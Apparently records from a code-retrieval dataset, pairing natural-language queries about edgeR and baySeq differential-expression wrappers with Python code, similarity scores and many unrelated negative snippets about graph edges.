[ "0.6346832", "0.62192637", "0.6143342", "0.59758323", "0.5957415", "0.595324", "0.595152", "0.59219795", "0.58347386", "0.578332", "0.57545054", "0.5665109", "0.5632672", "0.5599801", "0.55725056", "0.5564125", "0.55455124", "0.5536632", "0.5526659", "0.5524314", "0.5510719", "0.5491591", "0.5491591", "0.54823905", "0.5465794", "0.543087", "0.54209626", "0.53828865", "0.53786063", "0.5371017", "0.53667307", "0.53601915", "0.5358789", "0.5358121", "0.5328775", "0.53165567", "0.53134227", "0.5308953", "0.52981883", "0.5293412", "0.5291785", "0.5267685", "0.5251422", "0.52423286", "0.5220213", "0.521699", "0.52164006", "0.5204553", "0.52044415", "0.5200567", "0.5199698", "0.5187574", "0.5187574", "0.5177806", "0.5177563", "0.51705563", "0.51673084", "0.516388", "0.5162581", "0.5161071", "0.51518595", "0.51479894", "0.51435333", "0.5122203", "0.51161283", "0.51160073", "0.5112822", "0.5110093", "0.5108452", "0.5107477", "0.5105264", "0.5098151", "0.5092839", "0.50870574", "0.50869733", "0.5086808", "0.5081462", "0.5080366", "0.50793046", "0.5071497", "0.50703955", "0.5063597", "0.5061005", "0.50603634", "0.50536627", "0.50512964", "0.5048671", "0.5043866", "0.5042752", "0.50416076", "0.50408214", "0.5032529", "0.503203", "0.5025351", "0.5025092", "0.50196517", "0.50187373", "0.5017885", "0.50170445", "0.50155646", "0.50131863" ]
0.0
-1
Define the edgeR object
def __init__(self, count, group, repl, output): self._table_count = count self._groups_name = group self._replic = repl self._output = output self._message = Message() self._likelihood_column = 2 + len(group)*repl self._fdr_de_column = 4 + len(group)*repl self._likelihood = 0.95 self._fdr = 0.1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, *args):\n _snap.TNGraphEdgeI_swiginit(self, _snap.new_TNGraphEdgeI(*args))", "def __init__(self, name, edge, start_node, end_node, pipe_model,\n allow_flow_reversal,\n temperature_driven, repr_days=None):\n\n self.logger = logging.getLogger('modesto.Edge')\n self.logger.info('Initializing Edge {}'.format(name))\n\n self.repr_days = repr_days\n\n self.name = name\n self.edge = edge\n\n self.start_node = start_node\n self.end_node = end_node\n self.length = self.get_length()\n\n self.temperature_driven = temperature_driven\n\n self.pipe_model = pipe_model\n self.pipe = self.build(pipe_model,\n allow_flow_reversal) # TODO Better structure possible?", "def writeEDGE(self):\n\t\tpass", "def edge(cls, edge):\n return cls(Lnk.EDGE, int(edge))", "def main():\n e = Edge(12, 34, 5.67)\n print(e)", "def __init__(self, edgelist):\n self.edge = edgelist\n if edgelist:\n self.update_node2edge()", "def define_edge(self):\n\n self.canvas_edge = Line(\n points=[\n self.canvas_nodes[0].pos[0] + self.nodesize[0] / 2,\n self.canvas_nodes[0].pos[1] + self.nodesize[1] / 2,\n self.canvas_nodes[1].pos[0] + self.nodesize[0] / 2,\n self.canvas_nodes[1].pos[1] + self.nodesize[1] / 2\n ],\n joint='round',\n cap='round',\n width=3\n )", "def __repr__(self):\n return 'Edge(%s, %s)' % (repr(self[0]), repr(self[1]))", "def __init__(self, *args):\n _snap.TUNGraphEdgeI_swiginit(self, _snap.new_TUNGraphEdgeI(*args))", "def MakeEdge(self, *args):\n return _ShapeBuild.ShapeBuild_Edge_MakeEdge(self, *args)", "def __init__(self, outV, inV, **values):\r\n self._outV = outV\r\n self._inV = inV\r\n super(Edge, self).__init__(**values)", "def __init__(self):\n self._list: List[Edge] = list()", "def __init__(self, r,g,b):\n self.__r = r; self.__g = g; self.__b = b", "def __init__(self):\n self.edges = {} # outgoing edges with terminal symbols\n self.element = None # Elements stored at this node", "def __init__(self):\n\t\tself.edges = defaultdict(list)\n\t\tself.weights = {}", "def __init__(self):\n\t\tself.edges = defaultdict(list)\n\t\tself.weights = {}", "def edge_mapping(self):\n ...", "def edge(self, v, d):\n # method here", "def __edgeRouter(self):\r\n def getEndpoint(nodeTuple, pointList, direction, isReversedEdge):\r\n \"\"\" Gets the nearest arrow endpoint. Handles edge reversal \"\"\"\r\n if((direction == 'start' and not isReversedEdge)\r\n or (direction == 'end' and isReversedEdge)): \r\n endNode = nodeTuple[0]\r\n if(isReversedEdge):\r\n ix = -2\r\n iy = -1\r\n else:\r\n ix = 0\r\n iy = 1\r\n else: \r\n endNode = nodeTuple[1]\r\n if(isReversedEdge):\r\n ix = 0\r\n iy = 1\r\n else:\r\n ix = -2 \r\n iy = -1 \r\n \r\n # Is it connected to a named port!?!\r\n if(endNode.isConnectedByNamedPort(edgeObject)):\r\n handler = endNode.getConnectedByNamedPortHandler(nodeTuple[2]) \r\n return dc.coords(handler)[:2]\r\n \r\n # Not a named port...\r\n return list(endNode.getClosestConnector2Point( endNode, pointList[ix], \r\n pointList[iy])) \r\n \r\n \r\n \r\n #todo: improve method for spline arrows + add comments + optimize?\r\n print '----------------Dummy Edge Routing-----------------'\r\n for dummyEdge in NodeWrapper.ID2LayerEdgeDict.keys():\r\n \r\n dummyList = NodeWrapper.ID2LayerEdgeDict[dummyEdge]\r\n dummyNode = dummyList[0]\r\n dummyChild = dummyNode.children.keys()[0]\r\n linkFlagList = dummyNode.children[dummyChild]\r\n \r\n # Real nodes at start/end of the edge\r\n edgeSourceNode = dummyNode.parents.keys()[0]\r\n edgeSourceNode = edgeSourceNode.getASGNode().graphObject_\r\n dummyNode = dummyList[-1]\r\n edgeTargetNode = dummyNode.children.keys()[0]\r\n #print 'Dummy edge number', dummyEdge,\r\n #print dummyList[0].parents.keys()[0].getName(), edgeTargetNode.getName()\r\n edgeTargetNode = edgeTargetNode.getASGNode().graphObject_\r\n nodeTuple = [edgeSourceNode, edgeTargetNode, None]\r\n \r\n # Some edges are internally reversed to break cycles, when drawing\r\n # this must be taken into account\r\n isReversedEdge = False\r\n edgesToRoute = []\r\n for linkNode, isReversed in linkFlagList:\r\n edgesToRoute.append(linkNode)\r\n if(isReversed):\r\n isReversedEdge = True\r\n \r\n # Get all the points the edge must pass through (sorted by layer order)\r\n dummyList.sort(lambda a, b: cmp(a.getLayer(), b.getLayer()))\r\n if(isReversedEdge):\r\n dummyList.reverse()\r\n sortedDummyRouteList = []\r\n for node in dummyList:\r\n sortedDummyRouteList += node.getEdgePosition()\r\n \r\n # Set the coordinates of the edge directly \r\n # This is complicated by the fact that AToM3 treats edges as two\r\n # segments that join poorly (for spline arrows)\r\n for edgeObject in edgesToRoute: \r\n dc = edgeObject.graphObject_.dc\r\n linkObj = edgeObject.graphObject_ \r\n tag = linkObj.tag\r\n \r\n if(isReversedEdge):\r\n inPoint = dc.coords( tag + \"2ndSeg0\" )[:2]\r\n outPoint = dc.coords( tag + \"1stSeg0\" )[:2]\r\n else:\r\n inPoint = dc.coords( tag + \"1stSeg0\" )[:2]\r\n outPoint = dc.coords( tag + \"2ndSeg0\" )[:2]\r\n \r\n #print 'Dummy route', sortedDummyRouteList\r\n numPoints = len(sortedDummyRouteList) / 2\r\n # Add 2 extra control points for odd case (to make splines nice)\r\n if(numPoints % 2 == 1):\r\n if(numPoints == 1):\r\n center = sortedDummyRouteList\r\n else:\r\n start = sortedDummyRouteList[:numPoints - 1]\r\n end = sortedDummyRouteList[numPoints + 1:]\r\n center = sortedDummyRouteList[numPoints - 1:numPoints + 1]\r\n \r\n if(not isReversedEdge):\r\n newMid1 = [center[0], center[1] - 20]\r\n newMid2 = [center[0], center[1] + 20]\r\n else:\r\n newMid2 = [center[0], center[1] - 20]\r\n newMid1 = [center[0], center[1] + 20]\r\n \r\n \r\n if(numPoints == 1):\r\n sortedDummyRouteList = newMid1 + center + newMid2 \r\n else:\r\n sortedDummyRouteList = start + newMid1 + center + newMid2 + end\r\n centerIndex = numPoints - 1 + 2\r\n \r\n # Add 1 extra control point for even case (to make splines nice)\r\n else:\r\n start = sortedDummyRouteList[:numPoints]\r\n end = sortedDummyRouteList[numPoints:]\r\n center = [start[-2] + (end[0] - start[-2]) / 2, \r\n start[-1] + (end[1] - start[-1]) / 2]\r\n sortedDummyRouteList = start + center + end \r\n centerIndex = numPoints\r\n \r\n # Now I know where the center is... so lets move the center object\r\n # Is the edge object a hyperlink?\r\n if(len(edgeObject.in_connections_ + edgeObject.out_connections_) > 2):\r\n fromObjs = []\r\n for semObj in edgeObject.in_connections_:\r\n fromObjs.append(semObj.graphObject_)\r\n toObjs = []\r\n for semObj in edgeObject.out_connections_:\r\n toObjs.append(semObj.graphObject_)\r\n optimizerHyperLink(dc, linkObj, fromObjs, toObjs, 0, 0, 0, center )\r\n continue\r\n \r\n else:\r\n linkObj.moveTo(* center)\r\n \r\n # Go through the 2 segments in the link\r\n nodeTuple[2] = edgeObject\r\n for connTuple in linkObj.connections:\r\n itemHandler = connTuple[0]\r\n direction = connTuple[1]\r\n \r\n if( direction ): \r\n inPoint = getEndpoint(nodeTuple, sortedDummyRouteList,\r\n 'start', isReversedEdge)\r\n\r\n segCoords = inPoint + sortedDummyRouteList[:centerIndex+2]\r\n else: \r\n outPoint = getEndpoint(nodeTuple, sortedDummyRouteList,\r\n 'end', isReversedEdge) \r\n segCoords = sortedDummyRouteList[centerIndex:] + outPoint\r\n segCoords = self.__reverseCoordList(segCoords)\r\n \r\n # Applies the changed coords to the canvas\r\n dc.coords( * [itemHandler] + segCoords ) \r\n \r\n # This may change the associated link drawings: \r\n # move them to the new point \r\n if( direction ):\r\n linkObj.updateDrawingsTo(inPoint[0], inPoint[1], itemHandler, \r\n segmentNumber=1)\r\n else:\r\n linkObj.updateDrawingsTo(outPoint[0], outPoint[1], itemHandler, \r\n segmentNumber=2)", "def __init__(self):\n self.edges = defaultdict(list)\n self.weights = {}", "def __init__(self):\n self.edges = defaultdict(list)\n self.weights = {}", "def __init__(self):\n self.edges = defaultdict(list)\n self.weights = {}", "def edge(self) -> EdgeConfig:\n return self._edge", "def make_edge(self, a, b):\n try: e = self.G.new_edge(a, b)\n except: return self.G.new_edge(a,b)\n\n try: self.G.set_edge_attribute(e, \"arrow\", \"true\")\n except: return self.G.new_edge(a,b)\n\n try: self.G.set_edge_attribute(e, \"spline\", \"false\")\n except: return self.G.new_edge(a,b)\n return e", "def __init__(\n self, weights, edge_score_norm\n ):\n self.weights = weights\n self.edge_score_norm = edge_score_norm", "def edges( self ):\n raise NotImplementedError(\"edges\");", "def create(cls, outV, inV, *args, **kwargs):\r\n return super(Edge, cls).create(outV, inV, *args, **kwargs)", "def __init__(self, node_class=Node, edge_class=Edge):\n self.node_class = node_class\n self.edge_class = edge_class", "def __init__(self, startVertex, endVertex, edgeWeight):\n\n self.startVertex = startVertex\n self.endVertex = endVertex\n self.edgeWeight = edgeWeight", "def __repr__(self):\n return f\"EdgeType.{self.name}\"", "def add_edge(self, v1, v2):\n pass # TODO", "def _create_edge_ist(self) -> EdgeList:\r\n return EdgeList(self)", "def __init__(self, *args):\n _snap.TDirNetEdgeI_swiginit(self, _snap.new_TDirNetEdgeI(*args))", "def __init__(self):\n self.vertices = ((0, 0, 0),(1, 0, 0),(0, 1, 0),(0, 0, 1))\n self.edges=(0,1),(0,2),(0,3)", "def __init__(self, *args):\n _snap.TCrossNetEdgeI_swiginit(self, _snap.new_TCrossNetEdgeI(*args))", "def edge(self, edge: EdgeConfig):\n\n self._edge = edge", "def __init__(self, *args):\n _snap.TModeNetEdgeI_swiginit(self, _snap.new_TModeNetEdgeI(*args))", "def edges(self, e):\n self._edges = e", "def __init__(self, x0, r):\n self.x, self.r = x0, r", "def get_edge(self, from_, to):\n pass", "def __init__(self, *args):\n _snap.TNEANetEdgeI_swiginit(self, _snap.new_TNEANetEdgeI(*args))", "def __init__(self, node_a, node_b, id, edge_value=\"null\"):\n self.__node_a = node_a\n self.__node_b = node_b\n self.__edge_value = edge_value\n self.__id = id", "def __init__(self, vertices, edges, surfaces):\n #self.target = target\n #self.support = support\n self.vertices = vertices\n self.edges = edges\n self.surfaces = surfaces", "def mamajek08_logRpHK_Ro_edge():\n Ro_edge = 0.31935816876122064\n return Ro_edge", "def test_create_edge(self):\n n1, n2 = Node('a'), Node('b')\n n1 | n2\n self.assertEqual(n1.eout, [Edge(n1, n2)])\n self.assertEqual(n1.ein, [])\n self.assertEqual(n2.ein, [Edge(n1, n2)])\n self.assertEqual(n2.eout, [])", "def __init__(self):\n # Flag this instance as compiled now\n self.is_compiled = True\n \n super(HEReference, self).__init__(name='HEReference', num_nodes=0, edges=[])\n \n \n # Set the graph attributes\n self[\"mm__\"] = ['HimesisMM']\n \n self[\"name\"] = \"\"\"EReference\"\"\"\n self[\"GUID__\"] = uuid.uuid3(uuid.NAMESPACE_DNS,'EReference')\n \n # match model. We only support one match model\n self.add_node()\n self.vs[0][\"mm__\"] = \"\"\"MatchModel\"\"\"\n \n # apply model node\n self.add_node()\n self.vs[1][\"mm__\"] = \"\"\"ApplyModel\"\"\"\n \n # paired with relation between match and apply models\n self.add_node()\n self.vs[2][\"mm__\"] = \"\"\"paired_with\"\"\"\n \n \n # match class EReference() node\n self.add_node()\n\n self.vs[3][\"mm__\"] = \"\"\"EReference\"\"\" \n self.vs[3][\"attr1\"] = \"\"\"+\"\"\" \n # match_contains node for class EReference()\n self.add_node()\n self.vs[4][\"mm__\"] = \"\"\"match_contains\"\"\"\n \n \n # apply class EReference() node\n self.add_node()\n\n self.vs[5][\"mm__\"] = \"\"\"EReference\"\"\" \n self.vs[5][\"attr1\"] = \"\"\"1\"\"\"\n # apply_contains node for class EReference()\n self.add_node()\n self.vs[6][\"mm__\"] = \"\"\"apply_contains\"\"\"\n \n \n \n \n \n \n \n \n \n \n # Add the edges\n self.add_edges([\n (0,4), # matchmodel -> match_contains\n (4,3), # match_contains -> match_class EReference()\n (1,6), # applymodel -> apply_contains\n (6,5), # apply_contains -> apply_class EReference()\n (0,2), # matchmodel -> pairedwith\n (2,1) # pairedwith -> applyModel\t\t\t\t\n\t\t])\n\n # Add the attribute equations\n self[\"equations\"] = [((5,'name'),(3,'name')), ((5,'ordered'),(3,'ordered')), ((5,'unique'),(3,'unique')), ((5,'lowerBound'),(3,'lowerBound')), ((5,'upperBound'),(3,'upperBound')), ((5,'changeable'),(3,'changeable')), ((5,'volatile'),(3,'volatile')), ((5,'transient'),(3,'transient')), ((5,'defaultValueLiteral'),(3,'defaultValueLiteral')), ((5,'unsettable'),(3,'unsettable')), ((5,'derived'),(3,'derived')), ((5,'containment'),(3,'containment')), ((5,'resolveProxies'),(3,'resolveProxies')), ((5,'ApplyAttribute'),('constant','solveRef')), ]", "def __init__(self):\n\t\tself.edges = defaultdict(list)\n\t\tself.weights = {}\n\t\tself.connections = {}", "def graph(self):\n ...", "def add_edge(self, e):\n v, w = e\n self[v][w] = e\n self[w][v] = e", "def __init__(self, name):\n self.name = name\n self._edges = []", "def cell_edges(self):", "def add_edge(self, e):\n a, b = e\n self[a][b] = e\n self[b][a] = e", "def E(self, edge_type, feed=None, reverse=False):\n return super(Graph, self).E(edge_type, feed, reverse)", "def __init__(self, options, is_training=False):\n self.options = options\n self.is_training = is_training\n self.add_bi_directional_edges = None\n self.add_self_loop_edges = None\n self.use_reverse_edges = None", "def draw_edges(self):\n pass", "def __init__(self):\n ## Dictionary of edges, indexed by edge number\n self.edgeIndex = {}\n\n ## Dictionary of vertices, indexed by vertex number\n self.vertexIndex = {}\n\n ## Dictionary of vertices, indexed by parent\n self.parentIndex = {}\n\n ## Dictionary of vertices and edge numbers, indexed by parent\n self.parentEdgeIndex = {} \n \n ## Last edge number assigned\n self.__lastEdgeNumber = -1\n\n ## Dictionary of degree counts. Used for efficiently computing degree distribution\n self.__degreeCount = {}\n\n ## Logger instance\n self.logger = PyGelLogging().getLogger()", "def __init__(self,r1,r2):\n self.r1 = r1\n self.r2 = r2\n self.a = (r1+r2)/2", "def edges(self):\r\n return self.__generate_edges()", "def set_right_edges(self):\n for v in self:\n for e in v.edges_list:\n e.linked[0]=v\n e.linked[1]=self[self.search_index_by_coordinates(e.linked[1].coordinates)]\n for e in self.list_of_edges:\n e.linked[0]=self[self.search_index_by_coordinates(e.linked[0].coordinates)]\n e.linked[1]=self[self.search_index_by_coordinates(e.linked[1].coordinates)]", "def AddEdge(self, *args):\n return _BRepAlgo.BRepAlgo_Loop_AddEdge(self, *args)", "def __init__(self):\n self.graph = None", "def edges(self):\n return self.dovetails + self.containments + self.internals", "def edge(self, viz_edge: VizEdge) -> None:\n self._digraph.edge(viz_edge.start, viz_edge.end)", "def __init__(self, vertices, edges, faces):\n self.vertices = vertices\n self.edges = edges\n self.faces = faces", "def __init__(self, x0, y0, x1, y1, r):\n\n self._x0 = x0\n self._y0 = y0\n self._x1 = x1\n self._y1 = y1\n self._rsquared = r * r", "def addEdge(self, edge):\n Digraph.addEdge(self, edge)\n rev = Edge(edge.getDestination(), edge.getSource())\n Digraph.addEdge(self, rev)", "def __init__(self):\n raise NotImplementedError('cannot create independent arc')", "def __init__(self):\n self.graph = {}\n self.edges = 0\n self.vertices = 0", "def __init__(self, r=1, p=3):\n self.p = p\n self.r = r", "def __init__(self, graph, head_vertex, tail_vertex, weight):\n super(DirectedWeightedGraphEdge, self).__init__(\n graph, head_vertex, tail_vertex)\n self.weighted = True\n self.weight = weight", "def __init__(self, graph, head_vertex, tail_vertex):\n super(DirectedGraphEdge, self).__init__(\n graph, head_vertex, tail_vertex)\n self.directed = True", "def gen_graph(self):", "def add_edge(self, edge):\n self[edge[0]][edge[1]] = edge\n self[edge[1]][edge[0]] = edge", "def addEdge(self,x,y):\r\n self.matr[x][y] = True\r\n self.matr[y][x] = True", "def add_edge (self, src, dst, link):\n raise NotImplementedError", "def add_edge(self, a, b, label=\"\", color=\"black\", length=100, arrows=\"to\"):\n\n\t\tm = self.edgesPairs.count((a, b))\n\n\t\tif m == 0 :\n\t\t\tcolor = color\n\t\tif m == 1:\n\t\t\tcolor = \"red\"\n\t\tif m == 2:\n\t\t\tcolor = \"blue\"\n\n\t\tself.edgesPairs.append((a, b))\n\t\tself.edgesPairsId[self.edgesIdsCounter] = (a, b)\n\t\tself.edgesLabelsId[self.edgesIdsCounter] = label\n\n\t\tself.edges.append({\"id\": self.edgesIdsCounter,\n\t\t\t\t\t\t\"from\": a,\n\t\t\t\t\t\t\"to\": b,\n\t\t\t\t\t\t\"label\": label,\n\t\t\t\t\t\t\"arrows\": arrows,\n\t\t\t\t\t\t\"color\": color,\n\t\t\t\t\t\t\"length\": length\n\t\t\t\t\t\t})\n\t\tself.edgesIdsCounter += 1", "def build_edges(self):\n print(\"Constructing Edges.\")\n # -----------------------------------------\n # TODO: You should write this method!\n\n # Note: this method may take some time to run - it is likely to be O(N^2), and some lists have N = 10,000 words or more.\n # (I've had students decide that their program was \"broken\" and quit it before this process finished... every time,\n # not realizing that the program was working hard behind the scenes.)\n # I recommend that you keep track of the number of edges you have added, and if it is a multiple of 1000, print\n # something so that you know your program is making progress.\n n = len(self.vertices)\n\n\n\n \n # -----------------------------------------\n print(\"Done Constructing Edges.\\n------------------------------------\")", "def __init__(self, *args):\n _ShapeUpgrade.ShapeUpgrade_ShapeDivideClosedEdges_swiginit(self,_ShapeUpgrade.new_ShapeUpgrade_ShapeDivideClosedEdges(*args))", "def __call__(self, data):\n if data.edge_attr is None:\n c = torch.full(\n (data.edge_index.shape[1], 1), self.value, dtype=torch.float\n )\n data.edge_attr = c\n return data", "def edges(self):\n return self.__generate_edges()", "def edges(self):\n return self.__generate_edges()", "def edges(self):\n return self.__generate_edges()", "def edges(self):\n return self.generate_edges()", "def __init__(self, edge_attribute=None, keep_top_or_bottom='top', max_edges=50, qedge_keys=None, qnode_keys=[]): # noqa: E501\n self.openapi_types = {\n 'edge_attribute': str,\n 'keep_top_or_bottom': str,\n 'max_edges': int,\n 'qedge_keys': List[str],\n 'qnode_keys': List[str]\n }\n\n self.attribute_map = {\n 'edge_attribute': 'edge_attribute',\n 'keep_top_or_bottom': 'keep_top_or_bottom',\n 'max_edges': 'max_edges',\n 'qedge_keys': 'qedge_keys',\n 'qnode_keys': 'qnode_keys'\n }\n\n self._edge_attribute = edge_attribute\n self._keep_top_or_bottom = keep_top_or_bottom\n self._max_edges = max_edges\n self._qedge_keys = qedge_keys\n self._qnode_keys = qnode_keys", "def add_edge(self, start_node, label, end_node, properties=None, **kwargs):\r\n\t\tif properties is None:\r\n\t\t\tproperties = {}\r\n\t\tedge = Edge(self._nextid, start_node, label, end_node, properties, **kwargs)\r\n\t\tself._edges[self._nextid] = edge\r\n\t\tself._nextid += 1\r\n\t\treturn edge", "def add_edge(self, position):\n raise NotImplementedError()", "def __init__(self, graph, head_vertex, tail_vertex, weight):\n super(UnDirectedWeightedGraphEdge, self).__init__(\n graph, head_vertex, tail_vertex)\n self.weight = weight", "def __init__(self,r,x_c,y_c,z_c):\n self.r = r\n self.x_c = x_c\n self.y_c = y_c\n self.z_c = z_c", "def __init__(self,r,x_c,y_c,z_c):\n self.r = r\n self.x_c = x_c\n self.y_c = y_c\n self.z_c = z_c", "def save_edge(self, edge: Edge) -> Edge:", "def __init__(self, m,r,v):\n self.m = m\n self.r = r\n self.v = v\n self.rv = np.array([r,0,0,v])", "def __init__(self,**options):\n defaults={\"graph_name\":\"Graph\",\n \"node_names\":['n1','n2'],\n \"node_descriptions\":{'n1':\"A plain string\",\n 'n2':\"A list of strings with no \\\\n, created with string.splitlines()\"},\n \"current_node\":'n1',\n \"state\":[1,0],\n \"data\":\"This is a test string\\n it has to have multiple lines \\n and many characters 34%6\\n^\",\n \"edge_2_to_1\":edge_2_to_1,\n \"edge_1_to_2\":edge_1_to_2\n }\n self.options={}\n for key,value in defaults.iteritems():\n self.options[key]=value\n for key,value in options.iteritems():\n self.options[key]=value\n self.elements=['graph_name','node_names','node_descriptions','current_node','state','data']\n for element in self.elements:\n self.__dict__[element]=self.options[element]\n self.edges=[]\n self.edge_matrices=[]\n self.state_matrix=np.matrix(self.state).T\n # Add the first 2 edges, required to intialize the graph properly\n self.add_edge(self.node_names[0],self.node_names[1],self.options[\"edge_1_to_2\"])\n self.add_edge(self.node_names[1],self.node_names[0],self.options[\"edge_2_to_1\"])", "def GetBoundaryEdgesPent(self):\n\n p = self.InferPolynomialDegree()\n\n # DO NOT COMPUTE IF ALREADY COMPUTED\n if isinstance(self.edges,np.ndarray):\n if self.edges.shape[0] > 1:\n # IF LINEAR VERSION IS COMPUTED, DO COMPUTE HIGHER VERSION\n if self.edges.shape[1] == 2 and p > 1:\n pass\n else:\n return\n\n node_arranger = np.array([\n [0,1],\n [1,2],\n [2,3],\n [3,4],\n [4,0],\n ])\n\n # GET ALL EDGES FROM THE ELEMENT CONNECTIVITY\n all_edges = np.concatenate((self.elements[:,node_arranger[0,:]],self.elements[:,node_arranger[1,:]],\n self.elements[:,node_arranger[2,:]],self.elements[:,node_arranger[3,:]],\n self.elements[:,node_arranger[4,:]]),axis=0).astype(np.uint64)\n\n # GET UNIQUE ROWS\n uniques, idx, inv = unique2d(all_edges,consider_sort=True,order=False,return_index=True,return_inverse=True)\n\n # ROWS THAT APPEAR ONLY ONCE CORRESPOND TO BOUNDARY EDGES\n freqs_inv = itemfreq(inv)\n edges_ext_flags = freqs_inv[freqs_inv[:,1]==1,0]\n # NOT ARRANGED\n self.edges = uniques[edges_ext_flags,:]\n\n # DETERMINE WHICH FACE OF THE ELEMENT THEY ARE\n boundary_edge_to_element = np.zeros((edges_ext_flags.shape[0],2),dtype=np.int64)\n\n # FURTHER RE-ARRANGEMENT / ARANGE THE NODES BASED ON THE ORDER THEY APPEAR\n # IN ELEMENT CONNECTIVITY\n # THIS STEP IS NOT NECESSARY INDEED - ITS JUST FOR RE-ARANGMENT OF EDGES\n all_edges_in_edges = in2d(all_edges,self.edges,consider_sort=True)\n all_edges_in_edges = np.where(all_edges_in_edges==True)[0]\n\n boundary_edge_to_element[:,0] = all_edges_in_edges % self.elements.shape[0]\n boundary_edge_to_element[:,1] = all_edges_in_edges // self.elements.shape[0]\n\n # ARRANGE FOR ANY ORDER OF BASES/ELEMENTS AND ASSIGN DATA MEMBERS\n self.edges = self.elements[boundary_edge_to_element[:,0][:,None],node_arranger[boundary_edge_to_element[:,1],:]]\n self.edges = self.edges.astype(np.uint64)\n self.boundary_edge_to_element = boundary_edge_to_element\n\n return self.edges", "def __init__(self):\n self.type = None\n self.msg = \"\"\n self.process = None\n self.edge_id = None", "def __init__(self, *args):\n _snap.TUndirNetEdgeI_swiginit(self, _snap.new_TUndirNetEdgeI(*args))", "def __init__(self, sample_size, neighbours, lengths, offsets, seed=0):\n self.sample_size = sample_size\n self.seed, self.seed2 = random_seed.get_seed(seed)\n self.neighbours = neighbours\n self.lengths = lengths\n self.offsets = offsets\n super(UniformEdgeDataset, self).__init__()", "def edge(self, viz_edge: VizEdge) -> None:\n # Take CallNode as an example, instead of \"arguments point to CallNode\",\n # we want \"CallNode points to arguments\" in ast-dump form.\n #\n # The direction of edge is typically controlled by the implemented VizParser.\n # Reverse start/end here simply because we leverage default parser implementation.\n if viz_edge.end in self._graph:\n self._graph[viz_edge.end].append(viz_edge.start)\n else:\n self._graph[viz_edge.end] = [viz_edge.start]", "def addEdge(self,x,y):\n\t\tself._matr[x][y] = True", "def __init__(self,vertices):\n self._vertices = vertices\n self._edges = []\n for i in range(len(self._vertices)-1)\n self._edges.append( [i,i+1] )", "def __init__(self):\n super(BaseRNNEncoder, self).__init__()", "def __init__(self, edges):\n # Standardize the bin edge arrays and assign to an attribute\n edgearrs, dims = [], []\n for e in edges:\n earr = numpy.array(e)\n edgearrs.append(earr)\n dims.append(earr.ndim)\n\n try:\n d = dims[0]\n except IndexError:\n self.edges = ()\n else:\n equal = (dim == d for dim in dims)\n if d == 0 and all(equal):\n self.edges = (numpy.array(edgearrs),)\n elif d == 1 and all(equal):\n self.edges = tuple(edgearrs)\n else:\n raise ValueError(\"'edges' must be sequence of one-dimensional \"\n \"array-like containers\")\n\n # Compute bin widths and check validity\n valid = True\n binwidths = []\n for e in self.edges:\n ds = numpy.diff(e)\n valid = valid and numpy.all(ds > 0.0)\n binwidths.append(ds)\n\n if not valid:\n raise ValueError(\"valid bin edge arrays can only contain unique, \"\n \"sorted values\")\n\n self.binwidths = tuple(binwidths)" ]
[ "0.6473663", "0.6447562", "0.6428948", "0.64194375", "0.6335059", "0.62395126", "0.6237139", "0.6191634", "0.6189968", "0.61835927", "0.6147736", "0.6143343", "0.6141972", "0.61232835", "0.6109794", "0.6109794", "0.6081987", "0.6080473", "0.6080444", "0.6078262", "0.6078262", "0.6078262", "0.60549784", "0.6031396", "0.6016448", "0.6013766", "0.6010137", "0.6004708", "0.59720343", "0.5941808", "0.5934476", "0.59192044", "0.59106", "0.5901911", "0.58983225", "0.58946854", "0.5890084", "0.5871739", "0.58590925", "0.5858806", "0.5849707", "0.58240074", "0.58122665", "0.5807478", "0.5800726", "0.57959396", "0.57804984", "0.57797575", "0.5761811", "0.57404953", "0.57092327", "0.568719", "0.56827575", "0.56816864", "0.5668918", "0.56596404", "0.56577325", "0.5652195", "0.5635891", "0.5632508", "0.5607719", "0.55947566", "0.558508", "0.5583208", "0.5571238", "0.55695695", "0.5565862", "0.5559166", "0.5542714", "0.5523978", "0.5503804", "0.55006653", "0.54975444", "0.54969573", "0.54907745", "0.5471551", "0.54692024", "0.54687786", "0.546783", "0.5462357", "0.5462357", "0.5462357", "0.54579085", "0.54524314", "0.54411364", "0.5438523", "0.54191214", "0.54141027", "0.54141027", "0.5410302", "0.5408534", "0.54048234", "0.5404339", "0.5402457", "0.5396066", "0.53845435", "0.5383158", "0.5380361", "0.53724086", "0.5369308", "0.53693056" ]
0.0
-1
Execute default analysis with baySeq
def run_bayseq(self): try: res = robjects.r('library("parallel")') res = robjects.r('library("stats4")') res = robjects.r('library("BiocGenerics")') res = robjects.r('library("S4Vectors")') res = robjects.r('library("IRanges")') res = robjects.r('library("GenomeInfoDb")') res = robjects.r('library("abind")') # res = robjects.r('library("perm")') res = robjects.r('library("GenomicRanges")') res = robjects.r('library("baySeq")') res = robjects.r('if(require("parallel")) cl <- makeCluster(4) else cl <- NUL') ct = 'table <- read.csv("' + self._table_count + '", row.names = 1, header = TRUE, stringsAsFactors = FALSE)' res = robjects.r(ct) res = robjects.r('m <- as.matrix(table)') replicates = "" assert isinstance(self._replic, int) for ind in iter(self._groups_name): aux = "'" + ind + "', " replicates = replicates + aux * self._replic replicates = replicates[:(len(replicates) - 2)] replicates = 'replicates <- c(' + replicates + ')' res = robjects.r(replicates) groups = 'groups <- list(NDE = c('+ "1," * len(self._groups_name) groups = groups[:(len(groups) - 1)] + ')' groups = groups + ', DE = c('+ '1,' * self._replic groups = groups + '2,' * self._replic groups = groups[:(len(groups) - 1)] + "))" print(groups) res = robjects.r(groups) res = robjects.r('CD <- new("countData", data = m, replicates = replicates, groups = groups)') res = robjects.r('libsizes(CD) <- getLibsizes(CD)') res = robjects.r('CD <- getPriors.NB(CD, samplesize = 1000, estimation = "QL", cl = cl, equalDispersions = TRUE)') res = robjects.r('CD <- getLikelihoods(CD, prs=c(0.5, 0.5), pET="BIC", cl=cl)') # CD.posteriors.DE < - exp(CD @ posteriors)[, 2] res = robjects.r('write.table(topCounts(CD, group = "DE", number = 65000, normaliseData = TRUE), "' + self._output +'", sep="\t", quote = FALSE)') self._message.message_9("--- baySeq is completed!") except RRuntimeError as rre: self._message.message_9("Error in baySeq execution: " + str(rre)) raise rre
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
